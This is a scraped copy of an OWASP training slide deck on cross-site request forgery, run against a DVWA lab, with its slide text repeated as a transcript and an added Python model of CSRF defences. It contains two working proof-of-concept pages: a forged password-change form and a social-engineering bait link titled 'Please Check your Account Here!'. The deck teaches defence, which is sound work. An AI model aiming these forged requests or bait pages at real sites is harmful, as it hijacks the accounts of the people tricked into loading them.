UNDERSTANDING CROSS SITE REQUEST FORGERY
John Patrick Lita - OWASP Manila Chapter President
Venue: Philippine Army, Cyber Security Division, Taguig City
OWASP Taguig Chapter
DEEP UNDERSTANDING WITH CSRF VULNERABILITY
MEET THE PRESENTER
OWASP Manila Chapter President
Project Manager at Enterprise Linux Professionals
Owner of Active Security Training and Consultancy
Project leader for OWASP Online Academy
john.patrick.lita@owasp.org
CROSS SITE REQUEST FORGERY
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they are currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help from social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state-changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.
CSRF ILLUSTRATION
[Figure, slides 4-9: a Regular Form and a CSRF Form Template side by side, each with a "COMMENT HERE:" field and a POST button. The user types "I AM AWESOME!" into the regular form and the site shows "Jaypee: I AM AWESOME!". The CSRF Form Template then submits "I AM NOOB!" using the same logged-in session, and the site shows "Jaypee: I AM NOOB!" as if Jaypee had posted it.]
CANNOT READ THE ANTI-CSRF
NO SERVER SIDE VALIDATION
REVIEWING THE FORM
CHECKING THE SOURCE CODE
CSRF DEMO
PREVENTION MEASURES THAT DO NOT WORK
CSRF TEMPLATE WEB INTERFACE
Copy the code of the CSRF Template and save it as an HTML file, then open the file in any browser you like. Click Submit and analyse the behaviour.

After that, try to log in. The source code is on the next page (page 16).
CSRF TEMPLATE SOURCE CODE
<!DOCTYPE html>
<html>
  <head>
    <title>CSRF Template</title>
  </head>
  <body>
    <br>
    <!-- The form targets the DVWA change-password endpoint; the victim's
         browser attaches their session cookie to this cross-site request -->
    <form action="http://172.16.157.129/dvwa/vulnerabilities/csrf/?" method="GET">
      New Password:<br>
      <input type="password" autocomplete="off" name="password_new" value="12345"><br>
      Confirm New Password:<br>
      <input type="password" autocomplete="off" name="password_conf" value="12345"><br>
      <input type="submit" value="Change" name="Change">
    </form>
  </body>
</html>
PREVENTION MEASURES THAT DO NOT WORK
▸ Using a secret cookie
Remember that all cookies, even the secret ones, will be submitted with every request. All authentication tokens will be submitted regardless of whether or not the end-user was tricked into submitting the request. Furthermore, session identifiers are simply used by the application container to associate the request with a specific session object. The session identifier does not verify that the end-user intended to submit the request.
▸ Only accept POST requests
Applications can be developed to only accept POST requests for the execution of business logic. The misconception is that since the attacker cannot construct a malicious link, a CSRF attack cannot be executed. Unfortunately, this logic is incorrect. There are numerous methods in which an attacker can trick a victim into submitting a forged POST request, such as a simple form hosted in an attacker's website with hidden values. This form can be triggered automatically by JavaScript or can be triggered by the victim who thinks the form will do something else.
▸ Multi-Step Transaction
Multi-step transactions are not an adequate prevention of CSRF. As long as an attacker can predict or deduce each step of the completed transaction, then CSRF is possible.
▸ URL Rewriting
This might be seen as a useful CSRF prevention technique as the attacker cannot guess the victim's session ID. However, the user's session ID is exposed in the URL. We don't recommend fixing one security flaw by introducing another.
▸ HTTPS
HTTPS does nothing to defend against CSRF.
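The two failing defences above (secret cookie, POST-only) and the "NO SERVER SIDE VALIDATION" slide are easiest to see side by side. The model below is an added example, not code from the deck: it replays the page-16 change-password request against a tiny in-memory server under three policies and shows which ones let the forged request through. The cookie name PHPSESSID, the form field user_token and the Request/Server classes are constructed for the example.

```python
"""Secret cookie vs. POST-only vs. synchronizer token against a forged request.

Added example, not code from the deck: a minimal in-memory model of a
DVWA-style change-password endpoint. The cookie name PHPSESSID, the form
field user_token and the Request/Server classes are constructed for the
example; no web framework is involved.
"""
import hmac
import secrets
from dataclasses import dataclass


@dataclass
class Request:
    method: str       # "GET" or "POST"
    cookies: dict     # attached by the victim's browser to every request
    form: dict        # query string (GET) or body (POST) parameters


@dataclass
class Session:
    user: str
    csrf_token: str   # per-session secret the attacker's page cannot read
    password: str = "old-password"  # constructed sample state


class Server:
    """Server-side session store; the session id is the 'secret cookie'."""

    def __init__(self) -> None:
        self.sessions: dict[str, Session] = {}

    def login(self, user: str) -> tuple[str, str]:
        """Create a session and return (session id, anti-CSRF token)."""
        sid = secrets.token_urlsafe(32)
        token = secrets.token_urlsafe(32)
        self.sessions[sid] = Session(user=user, csrf_token=token)
        return sid, token

    def change_password(self, req: Request, policy: str) -> str:
        """Handle the request under one of three policies.

        cookie_only : trust the session cookie alone (fails: the browser
                      sends it with forged requests too)
        post_only   : additionally require POST (fails: a hidden form on
                      the attacker's site can POST)
        token       : additionally require the per-session token to be
                      echoed back in the form and validated server-side
        """
        session = self.sessions.get(req.cookies.get("PHPSESSID", ""))
        if session is None:
            return "rejected: not authenticated"
        if policy in ("post_only", "token") and req.method != "POST":
            return "rejected: method not allowed"
        if policy == "token":
            supplied = req.form.get("user_token", "")
            # Server-side validation is the whole point: compare the value
            # echoed in the form with the one stored in the session, in
            # constant time. A token that is rendered but never checked
            # here protects nothing.
            if not hmac.compare_digest(supplied, session.csrf_token):
                return "rejected: bad csrf token"
        if req.form.get("password_new") != req.form.get("password_conf"):
            return "rejected: passwords differ"
        session.password = req.form["password_new"]
        return "ok: password changed"


def run_scenarios() -> dict[str, dict[str, str]]:
    """Replay a legitimate submit and two forged requests under each policy."""
    results: dict[str, dict[str, str]] = {}
    for policy in ("cookie_only", "post_only", "token"):
        server = Server()
        sid, token = server.login("jaypee")
        cookies = {"PHPSESSID": sid}   # present in every request below
        # Legitimate submit from the real page, which rendered the token.
        legit = Request("POST", cookies, {"password_new": "N3w-pass",
                                          "password_conf": "N3w-pass",
                                          "user_token": token})
        # The cross-site GET produced by the CSRF template on page 16.
        forged_get = Request("GET", cookies, {"password_new": "12345",
                                              "password_conf": "12345",
                                              "Change": "Change"})
        # The same parameters sent by an auto-submitted hidden POST form.
        forged_post = Request("POST", cookies, {"password_new": "12345",
                                                "password_conf": "12345",
                                                "Change": "Change"})
        results[policy] = {
            "legit": server.change_password(legit, policy),
            "forged_get": server.change_password(forged_get, policy),
            "forged_post": server.change_password(forged_post, policy),
        }
    return results


if __name__ == "__main__":
    for policy, outcome in run_scenarios().items():
        print(policy, outcome)
```

Only the token policy rejects both forged requests; the cookie-only policy accepts everything, and POST-only stops just the GET variant.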
CSRF DEMO
CSRF ATTACK USING SOCIAL ENGINEERING
One technique, or attack vector, is to perform a click jacking attack. To test it, proceed to the next page for the source code, then execute it by clicking the "Click Here!" link.
CSRF ATTACK USING SOCIAL ENGINEERING
<!DOCTYPE html>
<html>
  <head>
    <title>Please Check your Account Here!</title>
  </head>
  <body>
    <h1>Check your account Here!</h1>
    <!-- Plain link to the DVWA change-password endpoint; the victim's browser
         sends their session cookie along with this cross-site GET request -->
    <a href="http://172.16.157.129/dvwa/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#">Click Here!</a>
  </body>
</html>
THANK YOU FOR LISTENING
JOHN.PATRICK.LITA@OWASP.ORG

SensoDat: Simulation-based Sensor Dataset of Self-driving CarsSensoDat: Simulation-based Sensor Dataset of Self-driving Cars
SensoDat: Simulation-based Sensor Dataset of Self-driving Cars
 
Salesforce Implementation Services PPT By ABSYZ
Salesforce Implementation Services PPT By ABSYZSalesforce Implementation Services PPT By ABSYZ
Salesforce Implementation Services PPT By ABSYZ
 
Enhancing Supply Chain Visibility with Cargo Cloud Solutions.pdf
Enhancing Supply Chain Visibility with Cargo Cloud Solutions.pdfEnhancing Supply Chain Visibility with Cargo Cloud Solutions.pdf
Enhancing Supply Chain Visibility with Cargo Cloud Solutions.pdf
 
Real-time Tracking and Monitoring with Cargo Cloud Solutions.pptx
Real-time Tracking and Monitoring with Cargo Cloud Solutions.pptxReal-time Tracking and Monitoring with Cargo Cloud Solutions.pptx
Real-time Tracking and Monitoring with Cargo Cloud Solutions.pptx
 
eSoftTools IMAP Backup Software and migration tools
eSoftTools IMAP Backup Software and migration toolseSoftTools IMAP Backup Software and migration tools
eSoftTools IMAP Backup Software and migration tools
 
The Role of IoT and Sensor Technology in Cargo Cloud Solutions.pptx
The Role of IoT and Sensor Technology in Cargo Cloud Solutions.pptxThe Role of IoT and Sensor Technology in Cargo Cloud Solutions.pptx
The Role of IoT and Sensor Technology in Cargo Cloud Solutions.pptx
 
2024 DevNexus Patterns for Resiliency: Shuffle shards
2024 DevNexus Patterns for Resiliency: Shuffle shards2024 DevNexus Patterns for Resiliency: Shuffle shards
2024 DevNexus Patterns for Resiliency: Shuffle shards
 

Understanding CSRF

  • 1. UNDERSTANDING CROSS SITE REQUEST FORGERY. John Patrick Lita, OWASP Manila Chapter President. Venue: Philippine Army, Cyber Security Division, Taguig City. OWASP Taguig Chapter.
  • 2. DEEP UNDERSTANDING WITH CSRF VULNERABILITY. MEET THE PRESENTER: OWASP Manila Chapter President; Project Manager at Enterprise Linux Professionals; Owner of Active Security Training and Consultancy; Project leader for OWASP Online Academy. john.patrick.lita@owasp.org
  • 3. CROSS SITE REQUEST FORGERY. Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they are currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help from social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state-changing requests such as transferring funds or changing their email address. If the victim is an administrative account, CSRF can compromise the entire web application.
  • 4–9. CSRF ILLUSTRATION (figure, six frames). Two comment forms sit side by side, a Regular Form and a CSRF Form Template, each with a COMMENT HERE field and a POST button. In the first frames the user types "I AM AWESOME!" into the regular form and the application posts "Jaypee: I AM AWESOME!". In the later frames the text "I AM NOOB!" is submitted from the CSRF form template and the application posts "Jaypee: I AM NOOB!" under the same user: the server cannot tell which form built the request.
  • 10. CANNOT READ THE ANTI-CSRF TOKEN (screenshot): the attacker's page cannot read the token the application embeds in its own form, so a forged request arrives without it.
  • 11. NO SERVER-SIDE VALIDATION (screenshot): the vulnerable endpoint accepts the request on the strength of the session cookie alone.
  • 12. REVIEWING THE FORM (screenshot).
  • 13. CHECKING THE SOURCE CODE (screenshot).
  • 14. CSRF DEMO
  • 15. PREVENTION MEASURES THAT DO NOT WORK. CSRF TEMPLATE WEB INTERFACE. Copy the code of the CSRF template on the next slide and save it as an HTML file, then open the file in any browser you like. Click Submit and analyse the behaviour. Then try to log in to the target and submit it again. The source code is on slide 16.
  • 16. CSRF TEMPLATE SOURCE CODE
  <!DOCTYPE html>
  <html>
  <head>
  <title>CSRF Template</title>
  </head>
  <body>
  <br>
  <form action="http://172.16.157.129/dvwa/vulnerabilities/csrf/?" method="GET">
  New Password:<br>
  <input type="password" AUTOCOMPLETE="off" name="password_new" value="12345"><br>
  Confirm New Password:<br>
  <input type="password" AUTOCOMPLETE="off" name="password_conf" value="12345"><br>
  <input type="submit" value="Change" name="Change">
  </form>
  </body>
  </html>
  • 17. PREVENTION MEASURES THAT DO NOT WORK ▸ Using a secret cookie. Remember that all cookies, even the secret ones, are submitted with every request. All authentication tokens are submitted regardless of whether or not the end user was tricked into submitting the request. Furthermore, session identifiers are simply used by the application container to associate the request with a specific session object. The session identifier does not verify that the end user intended to submit the request.
  • 18. ▸ Only accept POST requests. Applications can be developed to accept only POST requests for the execution of business logic. The misconception is that since the attacker cannot construct a malicious link, a CSRF attack cannot be executed. Unfortunately, this logic is incorrect. There are numerous methods by which an attacker can trick a victim into submitting a forged POST request, such as a simple form with hidden values hosted on the attacker's website. This form can be triggered automatically by JavaScript or by a victim who thinks the form will do something else.
  • 19. ▸ Multi-step transactions. Multi-step transactions are not an adequate prevention of CSRF. As long as an attacker can predict or deduce each step of the completed transaction, CSRF is possible. ▸ URL rewriting. This might be seen as a useful CSRF prevention technique because the attacker cannot guess the victim's session ID. However, the user's session ID is then exposed in the URL. We do not recommend fixing one security flaw by introducing another. ▸ HTTPS. HTTPS does nothing to defend against CSRF.
  • 20. CSRF DEMO
  • 21. CSRF ATTACK USING SOCIAL ENGINEERING. One attack vector is social engineering: lure the victim into clicking a link that carries the forged request (the slide labels this click jacking, though no hidden frame is involved, only a bait link). To test it, copy the source code on the next slide, open it in a browser while logged in to the target, and click "Click Here!".
  • 22. CSRF ATTACK USING SOCIAL ENGINEERING
  <!DOCTYPE html>
  <html>
  <head>
  <title>Please Check your Account Here!</title>
  </head>
  <body>
  <p>Check your account Here!</p>
  <a href="http://172.16.157.129/dvwa/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#">Click Here!</a>
  </body>
  </html>